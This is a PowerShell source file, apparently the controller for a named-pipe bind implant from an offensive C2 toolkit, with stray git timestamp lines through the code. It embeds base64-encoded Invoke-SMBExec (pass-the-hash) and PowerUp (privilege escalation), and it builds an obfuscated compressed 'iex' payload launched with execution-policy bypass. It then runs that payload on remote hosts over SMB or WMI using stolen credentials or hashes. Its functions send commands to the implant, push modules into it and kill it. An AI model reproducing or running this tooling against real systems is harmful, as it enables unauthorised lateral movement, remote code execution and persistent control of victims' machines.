$smbexec = " ZnVuY3Rpb24gSW52b2tlLVNNQkV4ZWMNCnsNCjwjDQouU1lOT1BTSVMNCkludm9rZS1TTUJFeGVjIHBlcmZvcm1zIFNNQkV4ZWMgc3R5bGUgY29tbWFuZCBleGVjdXRpb24gd2l0aCBOVExNdjIgcGFzcyB0aGUgaGFzaCBhdXRoZW50aWNhdGlvbi4gSW52b2tlLVNNQkV4ZWMNCnN1cHBvcnRzIFNNQjEgYW5kIFNNQjIgd2l0aCBhbmQgd2l0aG91dCBTTUIgc2lnbmluZy4NCg0KLlBBUkFNRVRFUiBUYXJnZXQNCkhvc3RuYW1lIG9yIElQIGFkZHJlc3Mgb2YgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIFVzZXJuYW1lDQpVc2VybmFtZSB0byB1c2UgZm9yIGF1dGhlbnRpY2F0aW9uLg0KDQouUEFSQU1FVEVSIERvbWFpbg0KRG9tYWluIHRvIHVzZSBmb3IgYXV0aGVudGljYXRpb24uIFRoaXMgcGFyYW1ldGVyIGlzIG5vdCBuZWVkZWQgd2l0aCBsb2NhbCBhY2NvdW50cyBvciB3aGVuIHVzaW5nIEBkb21haW4gYWZ0ZXIgdGhlDQp1c2VybmFtZS4gDQoNCi5QQVJBTUVURVIgSGFzaA0KTlRMTSBwYXNzd29yZCBoYXNoIGZvciBhdXRoZW50aWNhdGlvbi4gVGhpcyBtb2R1bGUgd2lsbCBhY2NlcHQgZWl0aGVyIExNOk5UTE0gb3IgTlRMTSBmb3JtYXQuDQoNCi5QQVJBTUVURVIgQ29tbWFuZA0KQ29tbWFuZCB0byBleGVjdXRlIG9uIHRoZSB0YXJnZXQuIElmIGEgY29tbWFuZCBpcyBub3Qgc3BlY2lmaWVkLCB0aGUgZnVuY3Rpb24gd2lsbCBjaGVjayB0byBzZWUgaWYgdGhlIHVzZXJuYW1lDQphbmQgaGFzaCBwcm92aWRlcyBsb2NhbCBhZG1pbmlzdHJhdG9yIGFjY2VzcyBvbiB0aGUgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIENvbW1hbmRDT01TUEVDDQpEZWZhdWx0ID0gRW5hYmxlZDogUHJlcGVuZCAlQ09NU1BFQyUgL0MgdG8gQ29tbWFuZC4NCg0KLlBBUkFNRVRFUiBTZXJ2aWNlDQpEZWZhdWx0ID0gMjAgQ2hhcmFjdGVyIFJhbmRvbTogTmFtZSBvZiB0aGUgc2VydmljZSB0byBjcmVhdGUgYW5kIGRlbGV0ZSBvbiB0aGUgdGFyZ2V0Lg0KDQouUEFSQU1FVEVSIFNNQjENCihTd2l0Y2gpIEZvcmNlIFNNQjEuIFRoZSBkZWZhdWx0IGJlaGF2aW9yIGlzIHRvIHBlcmZvcm0gU01CIHZlcnNpb24gbmVnb3RpYXRpb24gYW5kIHVzZSBTTUIyIGlmIHN1cHBvcnRlZCBieSB0aGUNCnRhcmdldC4NCg0KLlBBUkFNRVRFUiBTbGVlcA0KRGVmYXVsdCA9IDE1MCBNaWxsaXNlY29uZHM6IFNldHMgdGhlIGZ1bmN0aW9uJ3MgU3RhcnQtU2xlZXAgdmFsdWVzIGluIG1pbGxpc2Vjb25kcy4gWW91IGNhbiB0cnkgdHdlYWtpbmcgdGhpcw0Kc2V0dGluZyBpZiB5b3UgYXJlIGV4cGVyaWVuY2luZyBzdHJhbmdlIHJlc3VsdHMuDQoNCi5FWEFNUExFDQpJbnZva2UtU01CRXhlYyAtVGFyZ2V0IDE5Mi4xNjguMTAwLjIwIC1Eb21haW4gVEVTVERPTUFJTiAtVXNlcm5hbWUgVEVTVCAtSGFzaCBGNkYzOEI3OTNEQjZBOTRCQTA0QTUyRjFEM0VFOTJGMCAtQ29tbWFuZCAiY29tbWFuZCBvciBsYXVuY2hlciB0byBleGVjdXRlIiAtdmVyYm9zZQ0KDQouRVhBTVBMRQ0KSW52b2tlLVNNQkV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtRG9tYWluIFRFU1RET01BSU4gLVVzZXJuYW1lIFRFU1QgLUhhc2ggRjZGMzhCNzkzREI2QTk0QkEwNEE1MkYxRDNFRTkyRjAgLUNvbW1hbmQgIm5ldCB1c2VyIFNNQkV4ZWMgV2ludGVyMjAxNyAvYWRkIg0KDQouRVhBTVBMRQ0KSW52b2tlLVNNQkV4ZWMgLVRhcmdldCAxOTIuMTY4LjEwMC4yMCAtRG9tYWluIFRFU1RET01BSU4gLVVzZXJuYW1lIFRFU1QgLUhhc2ggRjZGMzhCNzkzREI2QTk0QkEwNEE1MkYxRDNFRTkyRjANCg0KLkxJTksNCmh0dHBzOi8vZ2l0aHViLmNvbS9LZXZpbi1Sb2JlcnRzb24vSW52b2tlLVRoZUhhc2gNCg0KIz4NCltDbWRsZXRCaW5kaW5nKCldDQpwYXJhbQ0KKA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSR0cnVlKV1bU3RyaW5nXSRUYXJnZXQsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JHRydWUpXVtTdHJpbmddJFVzZXJuYW1lLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kRG9tYWluLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kQ29tbWFuZCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtWYWxpZGF0ZVNldCgiWSIsIk4iKV1bU3RyaW5nXSRDb21tYW5kQ09NU1BFQz0iWSIsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bVmFsaWRhdGVTY3JpcHQoeyRfLkxlbmd0aCAtZXEgMzIgLW9yICRfLkxlbmd0aCAtZXEgNjV9KV1bU3RyaW5nXSRIYXNoLA0KICAgIFtwYXJhbWV0ZXIoTWFuZGF0b3J5PSRmYWxzZSldW1N0cmluZ10kU2VydmljZSwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtTd2l0Y2hdJFNNQjEsDQogICAgW3BhcmFtZXRlcihNYW5kYXRvcnk9JGZhbHNlKV1bU3RyaW5nXSRQYXNzd29yZCwNCiAgICBbcGFyYW1ldGVyKE1hbmRhdG9yeT0kZmFsc2UpXVtJbnRdJFNsZWVwPTE1MA0KKQ0KDQppZighJFBhc3N3b3JkIC1hbmQgISRIYXNoKXsNCiAgICBleGl0DQp9DQoNCmlmKCRQYXNzd29yZCl7DQogICAgJEhhc2ggPSBHZXQtTUQ0SGFzaCAtRGF0YVRvSGFzaCAkKFtUZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkUGFzc3dvcmQpKQ0KICAgIFdyaXRlLU91dHB1dCAiSGFzaCBiZWluZyB1c2VkOiAkSGFzaCINCn0NCg0KaWYoJENvbW1hbmQpDQp7DQogICAgJFNNQl9leGVjdXRlID0gJHRydWUNCn0NCg0KaWYoJFNNQjEpDQp7DQogICAgJFNNQl92ZXJzaW9uID0gJ1NNQjEnDQp9DQoNCmZ1bmN0aW9uIENvbnZlcnRGcm9tLVBhY2tldE9yZGVyZWREaWN0aW9uYXJ5DQp7DQogICAgcGFyYW0oJHBhY2tldF9vcmRlcmVkX2RpY3Rpb25hcnkpDQoNCiAgICBGb3JFYWNoKCRmaWVsZCBpbiAkcGFja2V0X29yZGVyZWRfZGljdGlvbmFyeS5WYWx1ZXMpDQogICAgew0KICAgICAgICAkYnl0ZV9hcnJheSArPSAkZmllbGQNCiAgICB9DQoNCiAgICByZXR1cm4gJGJ5dGVfYXJyYXkNCn0NCg0KI05ldEJJT1MNCg0KZnVuY3Rpb24gR2V0LVBhY2tldE5ldEJJT1NTZXNzaW9uU2VydmljZSgpDQp7DQogICAgcGFyYW0oW0ludF0kcGFja2V
# Convert server scriptblock to base64 with compression
$ScriptBytes = ( [ Text.Encoding ] :: ASCII ) . GetBytes ( $s_scriptblock )
$CompressedStream = New-Object IO . MemoryStream
$DeflateStream = New-Object IO . Compression . DeflateStream ( $CompressedStream , [ IO.Compression.CompressionMode ] :: Compress )
$DeflateStream . Write ( $ScriptBytes , 0 , $ScriptBytes . Length )
$DeflateStream . Dispose ( )
$CompressedScriptBytes = $CompressedStream . ToArray ( )
$CompressedStream . Dispose ( )
$EncodedCompressedScript = [ Convert ] :: ToBase64String ( $CompressedScriptBytes )
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + " ' $EncodedCompressedScript ' " + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$payload = " cmd /c powershell -exec bypass -c `" `" $NewScript `" `" "
2018-08-15 08:18:05 +00:00
if ( $hash . ispresent ) {
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $target \ $user2 " , " $Password2 " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain2 \ $user2 " , " $Password2 " )
}
}
else {
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $target \ $user " , " $Password " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain \ $user " , " $Password " )
}
2018-07-23 08:55:15 +00:00
}
# if psexec
if ( $PSexec . IsPresent ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Hash `" $hash `" -Command `" $payload `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Password `" $password `" -Command `" $payload `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $password ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Password `" $password `" -Command `" $payload `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $user `" -Hash `" $hash `" -Command `" $payload `" "
}
$success = IEX $wmicmd
$success
}
$PIPE_runspace = [ RunspaceFactory ] :: CreateRunspace ( )
$PIPE_runspace . Open ( )
$PIPE_runspace . SessionStateProxy . SetVariable ( 'pipestate' , $pipestate )
$PIPE_powershell = [ PowerShell ] :: Create ( )
$PIPE_powershell . Runspace = $PIPE_runspace
$PIPE_powershell . AddScript ( $c_scriptblock ) > $null
$PIPE_powershell . BeginInvoke ( ) > $null
echo " "
$endtime = ( Get-Date ) . AddMilliseconds ( $timeout )
while ( ( Get-Date ) -lt $endtime ) {
if ( $pipestate . state -eq $true )
{ break }
2018-08-15 08:18:05 +00:00
#echo $pipestate.state
2018-07-23 08:55:15 +00:00
}
if ( $pipestate . state -eq $True ) {
echo " Connected: $target - $pname "
echo " "
}
elseif ( ( get-date ) -lt $endtime ) {
echo " Not Connected: Timeout occured "
}
else {
echo " Not Connected: :-( "
}
}
}
function Pbind-Command ( $command ) {
<#
. SYNOPSIS
Used to interact with the implant and send basic commands .
. EXAMPLE
PS C: \ > Pbind-Command ipconfig
. DESCRIPTION
2018-08-15 08:18:05 +00:00
Runs ipconfig on the target endpoint and returns the output . See pbind scripts to execute more advanced powershell .
2018-07-23 08:55:15 +00:00
#>
if ( $pipestate . state -eq $true ) {
$script:pipestate . log = $null
echo " "
echo " [+] Sending command: $command "
echo " "
$script:pipestate . command = $command
while ( $pipestate . log -eq $null ) { }
$output = $pipestate . log -replace '123456(.+?)654321' , ''
$output
}
else {
echo " Not Connected: Command Not Sent "
}
}
function Pbind-module ( $command ) {
<#
. SYNOPSIS
Used to upload modules to the implant .
. EXAMPLE
PS C: \ > Pbind-module " c:\modules folder\powerview.ps1 "
. DESCRIPTION
2018-08-15 08:18:05 +00:00
Reads in a ps1 file into the implant , will execute if auto run configured .
Use pbind-module to run function s loaded in memory ( this is all done local to where the implant is run and does not work well with a C2 - see command scripts for better use case in a C2 .
2018-07-23 08:55:15 +00:00
#>
if ( $pipestate . state -eq $true ) {
$pipestate . log = $null
echo " "
echo " [+] Loading Module $command "
echo " "
2018-08-15 08:18:05 +00:00
$mod = " $command "
#echo "collecting module $command"
$content = [ IO.File ] :: ReadAllText ( $mod )
$script:pipestate . command = $content
2018-07-23 08:55:15 +00:00
while ( $pipestate . log -eq $null ) { }
$output = $pipestate . log -replace '123456(.+?)654321' , ''
$output }
else {
echo " Not Connected: Command Not Sent "
}
}
function Pbind-Kill ( $command ) {
<#
. SYNOPSIS
Used to kill the implant on the target .
. EXAMPLE
PS C: \ > Pbind-Kill
. DESCRIPTION
Destroys Pipe on target
#>
if ( $pipestate . state -eq $true ) {
echo " "
" [-] Killing pipe "
2018-08-15 08:18:05 +00:00
$script:pipestate . state = $false
$script:pipestate . command = " KILLPIPE "
2018-07-23 08:55:15 +00:00
echo " "
}
else {
echo " Not Connected: Command Not Send "
}
}
2018-08-15 08:18:05 +00:00
function Pbind-squirt ( $command ) {
<#
. SYNOPSIS
Used to squirt modules into memory , only works with pre-configured modules such as powerup ( already bundled )
. EXAMPLE
PS C: \ > Pbind-squirt powerup
. DESCRIPTION
Loads base64 ' d modules into the implant , will execute if auto run configured . Use pbind-command to run function s loaded in memory .
#>
$powerup = " PCMKICAgIFBvd2VyVXAgYWltcyB0byBiZSBhIGNsZWFyaW5naG91c2Ugb2YgY29tbW9uIFdpbmRvd3MgcHJpdmlsZWdlIGVzY2FsYXRpb24KICAgIHZlY3RvcnMgdGhhdCByZWx5IG9uIG1pc2NvbmZpZ3VyYXRpb25zLiBTZWUgUkVBRE1FLm1kIGZvciBtb3JlIGluZm9ybWF0aW9uLgoKICAgIEF1dGhvcjogQGhhcm1qMHkKICAgIExpY2Vuc2U6IEJTRCAzLUNsYXVzZQogICAgUmVxdWlyZWQgRGVwZW5kZW5jaWVzOiBOb25lCiAgICBPcHRpb25hbCBEZXBlbmRlbmNpZXM6IE5vbmUKIz4KCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojCiMgSGVscGVycwojCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCgpmdW5jdGlvbiBHZXQtTW9kaWZpYWJsZUZpbGUgewo8IwogICAgLlNZTk9QU0lTCgogICAgICAgIEhlbHBlciB0byByZXR1cm4gYW55IG1vZGlmaWFibGUgZmlsZSB0aGF0J3MgYSBwYXJ0IG9mIGEgcGFzc2VkIHN0cmluZy4KICAgICAgICAKICAgIC5FWEFNUExFCgogICAgICAgIFBTIEM6XD4gJyJDOlxUZW1wXGJsYWguYmF0IiAtZiAiQzpcVGVtcFxjb25maWcuaW5pIicgfCBHZXQtTW9kaWZpYWJsZUZpbGUKCiAgICAgICAgUmV0dXJuIHRoZSBwYXRocyAiQzpcVGVtcFxibGFoLmJhdCIgb3IgIkM6XFRlbXBcY29uZmlnLmluaSIgaWYgdGhleSBhcmUKICAgICAgICBtb2RpZmFibGUgYnkgdGhlIGN1cnJlbnQgdXNlciBjb250ZXh0LgojPgoKICAgIFtDbWRsZXRCaW5kaW5nKCldCiAgICBQYXJhbSgKICAgICAgICBbUGFyYW1ldGVyKFZhbHVlRnJvbVBpcGVsaW5lPSRUcnVlLCBNYW5kYXRvcnkgPSAkVHJ1ZSldCiAgICAgICAgW1N0cmluZ10KICAgICAgICAkUGF0aAogICAgKQoKICAgIGJlZ2luIHsKICAgICAgICAjIGZhbHNlIHBvc2l0aXZlcwogICAgICAgICRFeGNsdWRlcyA9IEAoIk1zTXBFbmcuZXhlIiwgIk5pc1Nydi5leGUiKQoKICAgICAgICAkT3JpZ0Vycm9yID0gJEVycm9yQWN0aW9uUHJlZmVyZW5jZQogICAgICAgICRFcnJvckFjdGlvblByZWZlcmVuY2UgPSAiU2lsZW50bHlDb250aW51ZSIKICAgIH0KCiAgICBwcm9jZXNzIHsKICAgICAgICAkQ2FuZGlkYXRlRmlsZXMgPSBAKCkKCiAgICAgICAgIyB0ZXN0IGZvciBxdW90ZS1lbmNsb3NlZCBhcmdzIGZpcnN0LCByZXR1cm5pbmcgZmlsZXMgdGhhdCBleGlzdCBvbiB0aGUgc3lzdGVtCiAgICAgICAgJENhbmRpZGF0ZUZpbGVzICs9ICRQYXRoLnNwbGl0KCJgIiciKSB8IFdoZXJlLU9iamVjdCB7ICRfIC1hbmQgKFRlc3QtUGF0aCAkXykgfQoKICAgICAgICAjIG5vdyBjaGVjayBmb3Igc3BhY2Utc2VwYXJhdGVkIGFyZ3MsIHJldHVybmluZyBmaWxlcyB0aGF0IGV4aXN0IG9uIHRoZSBzeXN0ZW0KICAgICAgICAkQ2FuZGlkYXRlRmlsZXMgKz0gJFBhdGguc3BsaXQoKSB8IFdoZXJlLU9iamVjdCB7ICRfIC1hbmQgKFRlc3QtUGF0aCAkXykgfQogICAgICAgIAogICAgICAgICMgc2VlIGlmIHdlIG5lZWQgdG8gc2tpcCBhbnkgZXhjbHVkZXMKICAgICAgICAkQ2FuZGlkYXRlRmlsZXMgfCBTb3J0LU9iamVjdCAtVW5pcXVlIHwgV2hlcmUtT2JqZWN0IHskX30gfCBXaGVyZS1PYmplY3QgewogICAgICAgICAgICAkU2tpcCA9ICRGYWxzZQogICAgICAgICAgICBGb3JFYWNoKCRFeGNsdWRlIGluICRFeGNsdWRlcykgewogICAgICAgICAgICAgICAgaWYoJF8gLW1hdGNoICRFeGNsdWRlKSB7ICRTa2lwID0gJFRydWUgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmKCEkU2tpcCkgeyRUcnVlfQogICAgICAgIH0gfCBGb3JFYWNoLU9iamVjdCB7CgogICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgIyBleHBhbmQgYW55ICVWQVJTJQogICAgICAgICAgICAgICAgJEZpbGVQYXRoID0gW1N5c3RlbS5FbnZpcm9ubWVudF06OkV4cGFuZEVudmlyb25tZW50VmFyaWFibGVzKCRfKQogICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAjIHRyeSB0byBvcGVuIHRoZSBmaWxlIGZvciB3cml0aW5nLCBpbW1lZGlhdGVseSBjbG9zaW5nIGl0CiAgICAgICAgICAgICAgICAkRmlsZSA9IEdldC1JdGVtIC1QYXRoICRGaWxlUGF0aCAtRm9yY2UKICAgICAgICAgICAgICAgICRTdHJlYW0gPSAkRmlsZS5PcGVuV3JpdGUoKQogICAgICAgICAgICAgICAgJE51bGwgPSAkU3RyZWFtLkNsb3NlKCkKICAgICAgICAgICAgICAgICRGaWxlUGF0aAogICAgICAgICAgICB9CiAgICAgICAgICAgIGNhdGNoIHt9CiAgICAgICAgfQogICAgfQoKICAgIGVuZCB7CiAgICAgICAgJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICRPcmlnRXJyb3IKICAgIH0KfQoKZnVuY3Rpb24gVGVzdC1TZXJ2aWNlRGFjbFBlcm1pc3Npb24gewo8IwogICAgLlNZTk9QU0lTCgogICAgICAgIFRoaXMgZnVuY3Rpb24gY2hlY2tzIGlmIHRoZSBjdXJyZW50IHVzZXIgaGFzIHNwZWNpZmljIERBQ0wgcGVybWlzc2lvbnMgCiAgICAgICAgZm9yIGEgc3BlY2lmaWMgc2VydmljZSB3aXRoIHRoZSBhaWQgb2YgJ3NjLmV4ZSBzZHNob3cnLgoKICAgIC5QQVJBTUVURVIgU2VydmljZU5hbWUKCiAgICAgICAgVGhlIHNlcnZpY2UgbmFtZSB0byB2ZXJpZnkgdGhlIHBlcm1pc3Npb25zIGFnYWluc3QuIFJlcXVpcmVkLgoKICAgIC5QQVJBTUVURVIgRGFjbAoKICAgICAgICBUaGUgREFDTCBwZXJtaXNzaW9ucy4gUmVxdWlyZWQuCiAgCiAgICAuRVhBTVBMRQoKICAgICAgICBQUyBDOlw+IFRlc3QtU2VydmljZURhY2xQZXJtaXNzaW9uIC1TZXJ2aWNlTmFtZSBWdWxuU1ZDIC1EYWNsIFdQUlBEQwoKICAgICAgICBSZXR1cm4gJFRydWUgaWYgdGhlIGN1cnJlbnQgdXNlciBoYXMgU3RvcCAoV1ApLCBTdGFydCAoUlApLAogICAgICAgIGFuZCBDaGFuZ2VDb25mIChEQykgc2VydmljZSBwZXJtaXNzaW9ucyBmb3IgJ1Z1bG5TVkMnIG90aGVyd2lzZSByZXR1cm4gJEZhbHNlLgoKICAgIC5MSU5LCgogICAgICAgIGh0dHBzOi8vc3VwcG9ydC5taWNyb3NvZnQuY29tL2VuLXVzL2tiLzkxNDM5MgogICAgICAgIGh0dHBzOi8vcm9obnNwb3dlcnNoZWxsYmxvZy53b3JkcHJlc3M
if ( $pipestate . state -eq $true ) {
$pipestate . log = $null
echo " "
echo " [+] Squirting Module "
echo " "
if ( $command -eq " powerup " ) {
$smodbase = $powerup }
$smod = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smodbase ) )
$script:pipestate . command = " squirtmodule $smod "
#echo $pipestate.command
while ( $pipestate . log -eq $null ) { }
$output = $pipestate . log -replace '123456(.+?)654321' , ''
$output }
else {
echo " Not Connected: Command Not Sent "
}
}
2018-07-23 08:55:15 +00:00
